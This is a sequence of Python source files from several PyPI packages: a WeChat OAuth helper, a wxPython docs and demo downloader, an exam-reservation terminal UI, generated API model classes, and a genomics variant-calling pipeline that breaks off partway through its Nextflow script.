return self.get_component_userinfo(access_token=access_token, openid=openid)
return self.get(self.WECHAT_OAUTH2_USERINFO, access_token=access_token, openid=openid)
def get_component_oauth_code_url(self, appid=None, redirect_uri=None, scope='snsapi_base', redirect_url=None, component_appid=None):
return self.WECHAT_COMPONENT_OAUTH2_AUTHORIZE.format(
appid=appid,
redirect_uri=urllib_parse.quote_plus(redirect_uri),
scope=scope,
state=urllib_parse.quote_plus(redirect_url),
component_appid=component_appid,
)
def get_component_access_info(self, appid=None, code=None, component_appid=None, component_access_token=None):
return self.get(self.WECHAT_COMPONENT_OAUTH2_ACCESS_TOKEN, appid=appid, code=code, component_appid=component_appid, component_access_token=component_access_token)
def get_component_userinfo(self, access_token=None, openid=None):
return self.get(self.WECHAT_COMPONENT_OAUTH2_USERINFO, access_token=access_token, openid=openid)
def get_oauth_redirect_url(self, oauth_uri, scope='snsapi_base', redirect_url=None, default_url=None, direct_redirect=None, force_popup=None, random_str=True):
"""
# https://a.com/wx/oauth2?redirect_url=redirect_url
# https://a.com/wx/oauth2?redirect_url=redirect_url&default_url=default_url
# https://a.com/wx/oauth2?scope=snsapi_base&redirect_url=redirect_url
# https://a.com/wx/oauth2?scope=snsapi_base&redirect_url=redirect_url&default_url=default_url
# https://a.com/wx/oauth2?scope=snsapi_base&redirect_url=redirect_url&default_url=default_url&direct_redirect=true
# https://a.com/wx/oauth2?scope=snsapi_base&redirect_url=redirect_url&default_url=default_url&direct_redirect=true&force_popup=true
# https://a.com/wx/o?r=redirect_url
# https://a.com/wx/o?r=redirect_url&d=default_url
# https://a.com/wx/o?s=snsapi_base&r=redirect_url
# https://a.com/wx/o?s=snsapi_base&r=redirect_url&d=default_url
# https://a.com/wx/o?s=snsapi_base&r=redirect_url&d=default_url&dr=true
# https://a.com/wx/o?s=snsapi_base&r=redirect_url&d=default_url&dr=true&fp=true
"""
oauth_url = oauth_uri.format(scope, urllib_parse.quote_plus(redirect_url), urllib_parse.quote_plus(default_url)) if default_url else oauth_uri.format(scope, urllib_parse.quote_plus(redirect_url))
oauth_url = '{0}&dr=true'.format(oauth_url) if direct_redirect else oauth_url
oauth_url = '{0}&fp=true'.format(oauth_url) if force_popup else oauth_url
oauth_url = '{0}&rs={1}'.format(oauth_url, shortuuid.uuid()) if random_str else oauth_url
return oauth_url
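# Illustrative flow sketch (not part of the original source). APPID, SECRET and the
# redirect values are placeholders, and the 'access_token'/'openid' keys assume the
# standard WeChat OAuth2 token response:
#   url = get_oauth_code_url(appid=APPID, redirect_uri='https://example.com/wx/oauth2',
#                            scope='snsapi_userinfo', redirect_url='https://example.com/next')
#   # ...the user opens `url`; WeChat redirects back with ?code=<code>...
#   info = get_access_info(appid=APPID, secret=SECRET, code=code)
#   user = get_userinfo(access_token=info['access_token'], openid=info['openid'])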
oauth = Oauth()
get_oauth_code_url = oauth.get_oauth_code_url
get_access_info = oauth.get_access_info
get_userinfo = oauth.get_userinfo
get_component_oauth_code_url = oauth.get_component_oauth_code_url
get_component_access_info = oauth.get_component_access_info
get_component_userinfo = oauth.get_component_userinfo
get_oauth_redirect_url = oauth.get_oauth_redirect_url | PypiClean |
/wxPython-zombie-3.1.5.6.tar.gz/wxPython-zombie-3.1.5.6/wx/tools/wxget_docs_demo.py | from __future__ import (division, absolute_import, print_function, unicode_literals)
import sys
import os
import subprocess
import webbrowser
import tarfile
if sys.version_info >= (3,):
from urllib.error import HTTPError
import urllib.request as urllib2
import urllib.parse as urlparse
from urllib.request import pathname2url
else:
import urllib2
from urllib2 import HTTPError
import urlparse
from urllib import pathname2url
import wx
from wx.tools import wxget
print(sys.version_info, sys.version, sys.argv)
APP = None
if wx.VERSION[0] != 4:
raise ValueError("wx Versions other than 4 not currently supported!")
def ensure_wx_app():
""" Ensure that there is a wx.App instance."""
global APP
if APP is None and not wx.GetApp():
APP = wx.App()
APP.SetAppName("wxPython")
return (APP is not None)
def get_paths_dict():
""" Get a dictionary of the required paths."""
global APP
ensure_wx_app()
sp = wx.StandardPaths.Get()
pathdict = {}
pathdict['TempDir'] = sp.GetTempDir()
pathdict['Cache'] = os.path.join(sp.GetUserLocalDataDir(), 'wxDocsDemoCache',
wx.VERSION_STRING)
pathdict['Docs_URL'] = wxget.get_docs_demo_url(False)
#pathdict['wxDocs'] = os.path.join(sp.GetAppDocumentsDir(), 'wxDocs', wx.VERSION_STRING)
pathdict['wxDocs'] = sp.GetAppDocumentsDir()
pathdict['Docs_Name'] = "wxPython-docs-%s" % wx.VERSION_STRING
pathdict['Demo_URL'] = wxget.get_docs_demo_url(True)
#pathdict['wxDemo'] = os.path.join(sp.GetUserLocalDataDir(), 'wxDemo', wx.VERSION_STRING)
pathdict['wxDemo'] = sp.GetUserLocalDataDir()
pathdict['Demo_Name'] = "wxPython-demo-%s" % wx.VERSION_STRING
pathdict['Ext'] = 'tar.gz'
return pathdict
def unpack_cached(cached, dest_dir):
""" Unpack from the cache."""
print('Unpack', cached, 'to', dest_dir)
with tarfile.open(cached, "r:*") as tf:
tf.extractall(dest_dir)
dest_dir = os.listdir(dest_dir)[0]
return dest_dir
def get_item(final, url, cache, name, ext, forced=False):
""" Get the item """
print('Looking for', name, 'at', final)
fullpath = os.path.join(final, name)
if os.path.exists(fullpath) and not forced: # Already exists
return fullpath
cached = os.path.join(cache, name)
cached = os.path.extsep.join([cached, ext])
print('Looking for cached', cached)
if not os.path.exists(cached) or forced: # No cached copy
yes_no = wx.MessageBox(
"\n".join(
["%s is not yet installed." % name,
"Go on-line to get it?",
"(Select No on charged or slow connections)"]),
"Download Prompt", wx.YES_NO|wx.CENTER|wx.ICON_INFORMATION)
if yes_no == wx.YES:
cached = wxget.download_file(url, cache, force=forced, trusted=True)
else:
report_error("Download Cancelled!")
if os.path.exists(cached): # We now have a cached copy
unpack_cached(cached, final)
else:
fullpath = None
return fullpath
def report_error(err_text):
""" Report a problem."""
ensure_wx_app()
wx.MessageBox(err_text, caption='ERROR!',
style=wx.OK|wx.CENTRE|wx.ICON_ERROR)
def done(result=0):
""" Tidy up and exit."""
global APP
if APP:
print("Closing Launcher App!") # Debug
if result:
print(result)
wx.Exit()
print("Done!")
sys.exit(result)
def docs_main(args=sys.argv):
""" Get/Launch Docs."""
ensure_wx_app()
result = 0
print("Launch Docs for wxPython V%s" % wx.VERSION_STRING)
pd = get_paths_dict()
location = get_item(pd['wxDocs'], pd['Docs_URL'], pd['Cache'],
pd['Docs_Name'], pd['Ext'], forced="--force" in args)
if location:
location = os.path.join(location, 'docs', 'html', 'index.html')
location_url = urlparse.urljoin('file:', pathname2url(location))
print("Show Docs at:", location)
webbrowser.open(location_url)
else:
result = 'Unable to find and show the wxPython Documentation!'
report_error(result)
done(result)
def demo_main(args=sys.argv):
""" Get/Launch Demo."""
result = 0
ensure_wx_app()
print("Launch Demo for wxPython V%s" % wx.VERSION_STRING)
pd = get_paths_dict()
location = get_item(pd['wxDemo'], pd['Demo_URL'], pd['Cache'],
pd['Demo_Name'], pd['Ext'], forced="--force" in args)
if location:
cmds = [sys.executable, os.path.join(location, "demo", "demo.py")]
print("Launching", cmds[1])
pid = subprocess.Popen(cmds).pid
#subprocess.check_call(cmds) # Use instead for debug
print("Demo starting as PID %s - may take a few seconds!" % pid)
else:
result = 'Unable to find and start the wxPython Demo!'
report_error(result)
done(result)
def main(args=sys.argv):
""" Command line main."""
if len(args) > 1:
if "demo" in args[1].lower():
return demo_main()
elif "docs" in args[1].lower():
return docs_main()
#else:
print(__doc__)
#else:
#APP = wx.App()
if __name__ == "__main__":
main() | PypiClean |
/esse3_student-3.7.0-py3-none-any.whl/esse3_student/tui/reservations.py | import asyncio
from esse3_student import cli
from textual.app import ComposeResult
from textual.binding import Binding
from textual.widgets import Static, Button, Footer, Checkbox
from textual.containers import Container, Horizontal, Vertical
from textual.screen import Screen
from rich import box
from rich.table import Table
class Header(Static):
pass
class Reservations(Screen):
class ViewReservations(Static):
def __init__(self, reservation, index: int) -> None:
self.reservation = reservation
self.index = index
super().__init__()
def table(self, reservation, index: int):
table = Table(box=box.SIMPLE_HEAD, style="rgb(139,69,19)")
table.add_column("#", justify="center", style="bold red")
for colum in reservation.keys():
if colum == "Name":
table.add_column(colum, justify="center", style="bold cyan", no_wrap=True)
elif colum == "Date":
table.add_column(colum, justify="center", style="bold yellow")
elif colum == "Cancella Prenotazione":
table.add_column(colum, justify="center", style="bold red")
else:
table.add_column(colum, justify="center", style="bold #f7ecb5")
row = list(reservation.values())
table.add_row(str(index), *row)
self.update(table)
def on_mount(self) -> None:
self.table(self.reservation, self.index)
class SelectExams(Horizontal):
def __init__(self, reservation) -> None:
self.values = list(reservation.values())
super().__init__()
def on_mount(self) -> None:
self.mount(self.Name(self.values[0]))
self.mount(self.Check(self.values[0]))
class Name(Static):
def __init__(self, name) -> None:
self.value = name
super().__init__()
def on_mount(self) -> None:
self.update(self.value)
class Check(Checkbox):
def __init__(self, value) -> None:
self.name_value = value
super().__init__()
def on_mount(self) -> None:
self.value = False
self.id = self.name_value
BINDINGS = [
Binding(key="r", action="app.pop_screen", description="return"),
]
async def fetch_date(self) -> None:
wrapper = None
try:
wrapper = cli.new_esse3_wrapper()
except:
await self.query_one(".reservations-loading").remove()
await self.query_one(".exams-container").mount(Static("Login failed !!!", classes="login-failed"))
if wrapper:
reservations = wrapper.fetch_reservations()
await self.query_one(".reservations-loading").remove()
if len(reservations) == 0:
await self.query_one(".exams-container").mount(Static(f"❌ No appeals booked !!", classes="reservations-empty"))
else:
await self.query_one(".exams-container").mount(
Vertical(classes="reservations-table"),
Static("Select the checkboxes of the exams to be removed:", classes="title"),
Container(classes="select-exams-container"),
)
for index, reservation in enumerate(reservations, start=1):
self.query_one(Vertical).mount(self.ViewReservations(reservation, index))
await self.query_one(".select-exams-container").mount(self.SelectExams(reservation))
await self.query_one(".exams-container").mount(Horizontal(Button("remove", id="remove")))
async def on_mount(self) -> None:
await asyncio.sleep(0.1)
asyncio.create_task(self.fetch_date())
def compose(self) -> ComposeResult:
yield Header("Reservations", classes="header")
yield Container(Static("List of Reservations:", classes="title"),
Static("loading [yellow]reservations[/] in progress.....", classes="reservations-loading"),
classes="exams-container")
yield Footer()
class Remove(Screen):
def __init__(self, reservations) -> None:
self.reservations = reservations
super().__init__()
async def fetch_date(self) -> None:
values, click = cli.new_esse3_wrapper().remove(self.reservations)
all_success = True
all_closed = True
for i in values.keys():
if i == 0:
all_success = False
else:
all_closed = False
await self.query_one("#reservations-loading-removed").remove()
if all_closed:
self.query_one(Container).mount(
Static(f"❌ Impossible to remove: [red]{', '.join([x for x in values[0]])}[/] cause subscription closed\n"
f"\n[bold]click saved: [blue]{click}",
classes="reservations-removed-error"))
elif all_success:
self.query_one(Container).mount(
Static(f"Reservations: [green]{', '.join([x for x in values[1]])}[/] removed\n"
f"\n[bold]click saved: [blue]{click}",
id="reservations-removed-success"))
else:
self.query_one(Container).mount(
Static(f"✅ Reservations: [green]{', '.join([x for x in values[1]])}[/] removed \n\n"
f"❌ Impossible to remove: [red]{', '.join([x for x in values[0]])}[/] cause subscription closed\n"
f"\n[bold]click saved: [blue]{click}",
classes="reservations-removed-mix"))
async def on_mount(self) -> None:
await asyncio.sleep(0.1)
asyncio.create_task(self.fetch_date())
def compose(self) -> ComposeResult:
yield Header("Reservations removed page", classes="header")
yield Container(Static("Reservations [yellow]removal[/] in progress.....", id="reservations-loading-removed"))
yield Footer()
BINDINGS = [
Binding(key="r", action="app.return('exams')", description="return"),
Binding(key="h", action="app.homepage('reservations')", description="homepage"),
] | PypiClean |
/py-pure-client-1.38.0.tar.gz/py-pure-client-1.38.0/pypureclient/pure1/Pure1_1_0/models/blade_array_status.py | import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.pure1.Pure1_1_0 import models
class BladeArrayStatus(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'str',
'name': 'str',
'resource_type': 'str',
'used_blades': 'int',
'total_blades': 'int'
}
attribute_map = {
'id': 'id',
'name': 'name',
'resource_type': 'resource_type',
'used_blades': 'used_blades',
'total_blades': 'total_blades'
}
required_args = {
}
def __init__(
self,
id=None, # type: str
name=None, # type: str
resource_type=None, # type: str
used_blades=None, # type: int
total_blades=None, # type: int
):
"""
Keyword args:
id (str): The opaque and unique id of this resource.
name (str): The name of this resource.
resource_type (str): The type of this resource represented by the name of its REST endpoint. For example, \"arrays\", \"network-interfaces\", and \"metrics\". The value may be `null` if the resource is not represented.
used_blades (int): Count of used blade slots in the array.
total_blades (int): Count of total blade slots in the array.
"""
if id is not None:
self.id = id
if name is not None:
self.name = name
if resource_type is not None:
self.resource_type = resource_type
if used_blades is not None:
self.used_blades = used_blades
if total_blades is not None:
self.total_blades = total_blades
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `BladeArrayStatus`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(BladeArrayStatus, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, BladeArrayStatus):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other | PypiClean |
/accelbyte_py_sdk-0.48.0.tar.gz/accelbyte_py_sdk-0.48.0/accelbyte_py_sdk/api/iam/models/model_user_info_response.py |
# template file: ags_py_codegen
# AccelByte Gaming Services Iam Service (7.1.0)
# pylint: disable=duplicate-code
# pylint: disable=line-too-long
# pylint: disable=missing-function-docstring
# pylint: disable=missing-module-docstring
# pylint: disable=too-many-arguments
# pylint: disable=too-many-branches
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-lines
# pylint: disable=too-many-locals
# pylint: disable=too-many-public-methods
# pylint: disable=too-many-return-statements
# pylint: disable=too-many-statements
# pylint: disable=unused-import
from __future__ import annotations
from typing import Any, Dict, List, Optional, Tuple, Union
from ....core import Model
class ModelUserInfoResponse(Model):
"""Model user info response (model.UserInfoResponse)
Properties:
display_name: (displayName) REQUIRED str
email_address: (emailAddress) REQUIRED str
namespace: (namespace) REQUIRED str
user_id: (userId) REQUIRED str
"""
# region fields
display_name: str # REQUIRED
email_address: str # REQUIRED
namespace: str # REQUIRED
user_id: str # REQUIRED
# endregion fields
# region with_x methods
def with_display_name(self, value: str) -> ModelUserInfoResponse:
self.display_name = value
return self
def with_email_address(self, value: str) -> ModelUserInfoResponse:
self.email_address = value
return self
def with_namespace(self, value: str) -> ModelUserInfoResponse:
self.namespace = value
return self
def with_user_id(self, value: str) -> ModelUserInfoResponse:
self.user_id = value
return self
# endregion with_x methods
# region to methods
def to_dict(self, include_empty: bool = False) -> dict:
result: dict = {}
if hasattr(self, "display_name"):
result["displayName"] = str(self.display_name)
elif include_empty:
result["displayName"] = ""
if hasattr(self, "email_address"):
result["emailAddress"] = str(self.email_address)
elif include_empty:
result["emailAddress"] = ""
if hasattr(self, "namespace"):
result["namespace"] = str(self.namespace)
elif include_empty:
result["namespace"] = ""
if hasattr(self, "user_id"):
result["userId"] = str(self.user_id)
elif include_empty:
result["userId"] = ""
return result
# endregion to methods
# region static methods
@classmethod
def create(
cls,
display_name: str,
email_address: str,
namespace: str,
user_id: str,
**kwargs,
) -> ModelUserInfoResponse:
instance = cls()
instance.display_name = display_name
instance.email_address = email_address
instance.namespace = namespace
instance.user_id = user_id
return instance
@classmethod
def create_from_dict(
cls, dict_: dict, include_empty: bool = False
) -> ModelUserInfoResponse:
instance = cls()
if not dict_:
return instance
if "displayName" in dict_ and dict_["displayName"] is not None:
instance.display_name = str(dict_["displayName"])
elif include_empty:
instance.display_name = ""
if "emailAddress" in dict_ and dict_["emailAddress"] is not None:
instance.email_address = str(dict_["emailAddress"])
elif include_empty:
instance.email_address = ""
if "namespace" in dict_ and dict_["namespace"] is not None:
instance.namespace = str(dict_["namespace"])
elif include_empty:
instance.namespace = ""
if "userId" in dict_ and dict_["userId"] is not None:
instance.user_id = str(dict_["userId"])
elif include_empty:
instance.user_id = ""
return instance
@classmethod
def create_many_from_dict(
cls, dict_: dict, include_empty: bool = False
) -> Dict[str, ModelUserInfoResponse]:
return (
            {k: cls.create_from_dict(v, include_empty=include_empty) for k, v in dict_.items()}
if dict_
else {}
)
@classmethod
def create_many_from_list(
cls, list_: list, include_empty: bool = False
) -> List[ModelUserInfoResponse]:
return (
[cls.create_from_dict(i, include_empty=include_empty) for i in list_]
if list_
else []
)
@classmethod
def create_from_any(
cls, any_: any, include_empty: bool = False, many: bool = False
) -> Union[
ModelUserInfoResponse,
List[ModelUserInfoResponse],
Dict[Any, ModelUserInfoResponse],
]:
if many:
if isinstance(any_, dict):
return cls.create_many_from_dict(any_, include_empty=include_empty)
elif isinstance(any_, list):
return cls.create_many_from_list(any_, include_empty=include_empty)
else:
raise ValueError()
else:
return cls.create_from_dict(any_, include_empty=include_empty)
@staticmethod
def get_field_info() -> Dict[str, str]:
return {
"displayName": "display_name",
"emailAddress": "email_address",
"namespace": "namespace",
"userId": "user_id",
}
@staticmethod
def get_required_map() -> Dict[str, bool]:
return {
"displayName": True,
"emailAddress": True,
"namespace": True,
"userId": True,
}
# endregion static methods | PypiClean |
/bio-minos-0.9.1.tar.gz/bio-minos-0.9.1/minos/multi_sample_pipeline.py | import logging
import os
import shutil
from cluster_vcf_records import vcf_file_read
from minos import dependencies, utils, vcf_file_split_deletions
class Error (Exception): pass
class MultiSamplePipeline:
def __init__(self,
ref_fasta,
input_data_tsv,
output_dir,
max_alleles_per_cluster=5000,
min_large_ref_length=50,
gramtools_max_read_length=0,
gramtools_kmer_size=5,
gramtools_build_threads=1,
nextflow_config_file=None,
nextflow_work_dir=None,
force=False,
no_run=False,
clean=True,
testing=False,
variants_per_split=None,
alleles_per_split=None,
total_splits=None,
nf_ram_cluster_small_vars=2,
nf_ram_gramtools_build_small=12,
nf_ram_minos_small_vars=5,
nf_ram_merge_small_vars=4,
use_unmapped_reads=False,
):
self.ref_fasta = os.path.abspath(ref_fasta)
if not os.path.exists(self.ref_fasta):
raise Error('Reference FASTA file not found: ' + ref_fasta)
self.input_data_tsv = os.path.abspath(input_data_tsv)
if not os.path.exists(self.input_data_tsv):
raise Error('Data TSV file not found: ' + input_data_tsv)
self.output_dir = os.path.abspath(output_dir)
self.nextflow_config_file = None if nextflow_config_file is None else os.path.abspath(nextflow_config_file)
self.max_alleles_per_cluster = max_alleles_per_cluster
self.min_large_ref_length = min_large_ref_length
self.gramtools_max_read_length = gramtools_max_read_length
self.gramtools_kmer_size = gramtools_kmer_size
self.gramtools_build_threads = gramtools_build_threads
if nextflow_work_dir is None:
self.nextflow_work_dir = os.path.join(self.output_dir, 'nextflow.work')
else:
self.nextflow_work_dir = os.path.abspath(nextflow_work_dir)
self.force = force
self.nextflow_input_tsv = os.path.join(self.output_dir, 'nextflow.input.tsv')
self.log_file = os.path.join(self.output_dir, 'log.txt')
self.no_run = no_run
self.clean = clean
self.testing = testing
self.variants_per_split = variants_per_split
self.alleles_per_split = alleles_per_split
self.total_splits = total_splits
self.nf_ram_cluster_small_vars = nf_ram_cluster_small_vars
self.nf_ram_gramtools_build_small = nf_ram_gramtools_build_small
self.nf_ram_minos_small_vars = nf_ram_minos_small_vars
self.nf_ram_merge_small_vars = nf_ram_merge_small_vars
self.use_unmapped_reads = use_unmapped_reads
@classmethod
def _load_input_data_tsv(cls, infile):
logging.info('Start reading file ' + infile)
data = []
with open(infile) as f:
for line in f:
try:
vcf_file, *reads_files = line.rstrip().split('\t')
except:
raise Error('Bad line in input TSV file: ' + line.rstrip())
if not(os.path.exists(vcf_file)):
raise Error('VCF file not found: ' + vcf_file)
for reads_file in reads_files:
if not(os.path.exists(reads_file)):
raise Error('Reads file not found: ' + reads_file)
data.append((os.path.abspath(vcf_file), [os.path.abspath(x) for x in reads_files]))
logging.info('Finish reading file ' + infile + '. Loaded ' + str(len(data)) + ' samples')
return data
@classmethod
def _merge_vcf_files(cls, infiles_list, outfile):
'''Reimplementation of bcftools merge. Load all files into
memory, then write output. bcftools opens all files at the same
time, which doesn't work for lots of files'''
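        # Illustrative sketch of the merge (not part of the original source); the
        # sample genotypes are made up. Given two single-sample VCFs whose first
        # nine columns are identical on each line:
        #   sampleA.vcf:  chr1  42  .  A  T  .  PASS  .  GT  1/1
        #   sampleB.vcf:  chr1  42  .  A  T  .  PASS  .  GT  0/1
        # the combined line keeps the shared columns once and appends one genotype
        # column per sample:
        #   chr1  42  .  A  T  .  PASS  .  GT  1/1  0/1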
vcf_file_data_list_per_sample = []
sample_names = []
header_lines = []
common_first_column_data = []
first_file = True
for filename in infiles_list:
new_data = []
with open(filename) as f_vcf:
for vcf_line in f_vcf:
if vcf_line.startswith('#'):
if first_file and vcf_line.startswith('##'):
header_lines.append(vcf_line.rstrip())
elif vcf_line.startswith('#CHROM'):
fields = vcf_line.rstrip().split('\t')
assert len(fields) == 10
sample_names.append(fields[-1])
else:
first_columns, last_column = vcf_line.rstrip().rsplit('\t', maxsplit=1)
new_data.append(last_column)
if first_file:
common_first_column_data.append(first_columns)
vcf_file_data_list_per_sample.append(new_data)
first_file = False
with open(outfile, 'w') as f:
print(*header_lines, sep='\n', file=f)
print('#CHROM', 'POS', 'ID', 'REF', 'ALT', 'QUAL', 'FILTER', 'INFO', 'FORMAT', *sample_names, sep='\t', file=f)
for i, common_first_data in enumerate(common_first_column_data):
sample_data_cols = [vcf_file_data_list_per_sample[j][i] for j in range(len(vcf_file_data_list_per_sample))]
print(common_first_data, *sample_data_cols, sep='\t', file=f)
@classmethod
def _filter_input_file_for_clustering(cls, infile, outfile):
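        # Descriptive note (not part of the original source): records flagged
        # MISMAPPED_UNPLACEABLE, records without a GT field, null calls and pure
        # reference (0/0) calls are dropped. Remaining records are rewritten so ALT
        # only lists the called allele(s): homozygous-alt calls become GT 1/1 with a
        # single ALT, ref/alt hets become 0/1, and alt/alt hets become 1/2.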
header_lines, vcf_records = vcf_file_read.vcf_file_to_dict(infile, sort=True, homozygous_only=False, remove_asterisk_alts=True, remove_useless_start_nucleotides=True)
with open(outfile, 'w') as f:
print(*header_lines, sep='\n', file=f)
for ref_name in vcf_records:
for vcf_record in vcf_records[ref_name]:
if 'MISMAPPED_UNPLACEABLE' in vcf_record.FILTER:
continue
if vcf_record.FORMAT is None or 'GT' not in vcf_record.FORMAT:
logging.warning('No GT in vcf record:' + str(vcf_record))
continue
genotype = vcf_record.FORMAT['GT']
genotypes = genotype.split('/')
called_alleles = set(genotypes)
if called_alleles == {'0'} or '.' in called_alleles:
continue
genotypes = sorted([int(x) for x in genotypes])
if len(called_alleles) == 1:
assert 0 not in genotypes
vcf_record.set_format_key_value('GT', '1/1')
vcf_record.ALT = [vcf_record.ALT[int(genotypes[0]) - 1]]
else:
assert len(called_alleles) == 2
vcf_record.set_format_key_value('GT', '0/1')
if 0 in genotypes:
vcf_record.set_format_key_value('GT', '0/1')
vcf_record.ALT = [vcf_record.ALT[genotypes[1] - 1]]
else:
vcf_record.set_format_key_value('GT', '1/2')
vcf_record.ALT = [vcf_record.ALT[genotypes[0] - 1], vcf_record.ALT[genotypes[1] - 1]]
print(vcf_record, file=f)
@classmethod
def _nextflow_helper_process_input_vcf_file(cls, infile, out_small_vars, out_big_vars, out_sample_name, min_large_ref_length):
splitter = vcf_file_split_deletions.VcfFileSplitDeletions(infile, out_small_vars, out_big_vars, min_large_ref_length=min_large_ref_length)
splitter.run()
header_lines = vcf_file_read.get_header_lines_from_vcf_file(infile)
sample_name = vcf_file_read.get_sample_name_from_vcf_header_lines(header_lines)
assert sample_name is not None
max_read_length = None
for line in header_lines:
if line.startswith('##minos_max_read_length='):
max_read_length = int(line.rstrip().split('=')[1])
with open(out_sample_name, "w") as f:
sample_name = vcf_file_read.get_sample_name_from_vcf_file(infile)
assert sample_name is not None
print(sample_name, file=f)
return max_read_length
@classmethod
def _write_nextflow_data_tsv(cls, data, outfile):
with open(outfile, 'w') as f:
print('sample_id', 'vcf_file', 'reads_files', sep='\t', file=f)
for i, (vcf_file, reads_files) in enumerate(data):
print(i, vcf_file, ' '.join(reads_files), sep='\t', file=f)
@classmethod
def _write_nextflow_script(cls, outfile):
with open(outfile, 'w') as f:
print(r'''
params.data_in_tsv = ""
params.ref_fasta = ""
params.min_large_ref_length = 0
params.gramtools_max_read_length = 0
params.gramtools_kmer_size = 0
params.gramtools_build_threads = 1
params.final_outdir = ""
params.testing = false
params.cluster_small_vars_ram = 2
params.gramtools_build_small_vars_ram = 12
params.minos_small_vars_ram = 5
params.pre_cluster_small_vars_merge_ram = 30
params.pre_cluster_small_vars_merge_threads = 1
params.merge_small_vars_ram = 4
params.variants_per_split = 0
params.alleles_per_split = 0
params.total_splits = 0
params.max_alleles_per_cluster = 5000
params.use_unmapped_reads = false
if (params.testing) {
params.pre_cluster_small_vars_merge_threads = 2
}
if (params.use_unmapped_reads) {
use_unmapped_reads = "--use_unmapped_reads"
}
else {
use_unmapped_reads = ""
}
data_in_tsv = file(params.data_in_tsv).toAbsolutePath()
ref_fasta = file(params.ref_fasta).toAbsolutePath()
final_outdir = file(params.final_outdir).toAbsolutePath()
if (!data_in_tsv.exists()) {
exit 1, "Input data TSV file not found: ${params.data_in_tsv} -- aborting"
}
if (!ref_fasta.exists()) {
exit 1, "Reference FASTA file not found: ${params.ref_fasta} -- aborting"
}
if (params.min_large_ref_length < 1) {
exit 1, "Must use option --min_large_ref_length -- aborting"
}
if (params.gramtools_kmer_size < 1) {
exit 1, "Must use option --gramtools_kmer_size -- aborting"
}
if (!final_outdir.exists()) {
exit 1, "Output directory not found: ${params.final_outdir} -- aborting"
}
split_tsv = Channel.from(data_in_tsv).splitCsv(header: true, sep:'\t')
process process_input_vcf_file {
memory '0.5 GB'
input:
val tsv_fields from split_tsv
output:
file("small_vars.${tsv_fields['sample_id']}.vcf") into process_input_vcf_file_out_small
set(val(tsv_fields), file("big_vars.${tsv_fields['sample_id']}.vcf")) into merge_small_and_large_vars_in
set(val(tsv_fields), file("sample_name.${tsv_fields['sample_id']}")) into minos_all_small_vars_tsv_in
stdout into max_read_lengths
"""
#!/usr/bin/env python3
from minos import multi_sample_pipeline
multi_sample_pipeline.MultiSamplePipeline._filter_input_file_for_clustering(
"${tsv_fields.vcf_file}",
'filtered.vcf'
)
max_read_length = multi_sample_pipeline.MultiSamplePipeline._nextflow_helper_process_input_vcf_file(
'filtered.vcf',
"small_vars.${tsv_fields['sample_id']}.vcf",
"big_vars.${tsv_fields['sample_id']}.vcf",
"sample_name.${tsv_fields['sample_id']}",
${params.min_large_ref_length}
)
if max_read_length is None:
print(0, end='')
else:
print(max_read_length, end='')
"""
}
process pre_cluster_small_vars_merge {
errorStrategy {task.attempt < 3 ? 'retry' : 'terminate'}
memory {params.testing ? '0.5 GB' : 1.GB * params.pre_cluster_small_vars_merge_ram * task.attempt}
maxRetries 3
cpus {params.testing? 2 : params.pre_cluster_small_vars_merge_threads}
input:
val(file_list) from process_input_vcf_file_out_small.collect()
output:
file('pre_cluster_small_vars_merge.vcf') into pre_cluster_small_vars_merge_out
"""
#!/usr/bin/env python3
from cluster_vcf_records import vcf_merge
import pyfastaq
ref_seqs = dict()
pyfastaq.tasks.file_to_dict("${ref_fasta}", ref_seqs)
file_list = ["${file_list.join('", "')}"]
vcf_merge.merge_vcf_files(file_list, ref_seqs, "pre_cluster_small_vars_merge.vcf", threads=${params.pre_cluster_small_vars_merge_threads})
"""
}
process cluster_small_vars_vcf {
errorStrategy {task.attempt < 3 ? 'retry' : 'terminate'}
memory {params.testing ? '0.5 GB' : 1.GB * params.cluster_small_vars_ram * task.attempt}
maxRetries 3
input:
file('pre_cluster_small_vars_merge.vcf') from pre_cluster_small_vars_merge_out
output:
file('small_vars_clustered.vcf') into cluster_small_vars_vcf_out
"""
#!/usr/bin/env python3
from cluster_vcf_records import vcf_clusterer
clusterer = vcf_clusterer.VcfClusterer(["pre_cluster_small_vars_merge.vcf"], "${ref_fasta}", "small_vars_clustered.vcf", max_alleles_per_cluster=${params.max_alleles_per_cluster})
clusterer.run()
"""
}
process split_vcfs {
errorStrategy {task.attempt < 3 ? 'retry' : 'terminate'}
memory {params.testing ? '0.5 GB' : 1.GB * params.gramtools_build_small_vars_ram * task.attempt}
maxRetries 3
input:
file('small_vars_clustered.vcf') from cluster_small_vars_vcf_out
val(max_read_length) from max_read_lengths.max()
output:
file('small_vars_clustered.vcf') into minos_adju_splits
file("gramtools.build_dir/split*.vcf") into gramtools_build_small_vars_vcfs mode flatten
"""
#!/usr/bin/env python3
import sys, shutil, glob, os
from minos import gramtools, vcf_chunker
if ${params.gramtools_max_read_length} == 0:
max_read_length = ${max_read_length}
else:
max_read_length = ${params.gramtools_max_read_length}
if max_read_length == 0:
print('Error! max read length could not be inferred from input VCF files. Must use option --gramtools_max_read_length')
sys.exit(1)
total_splits = ${params.total_splits} if ${params.total_splits} > 0 else None
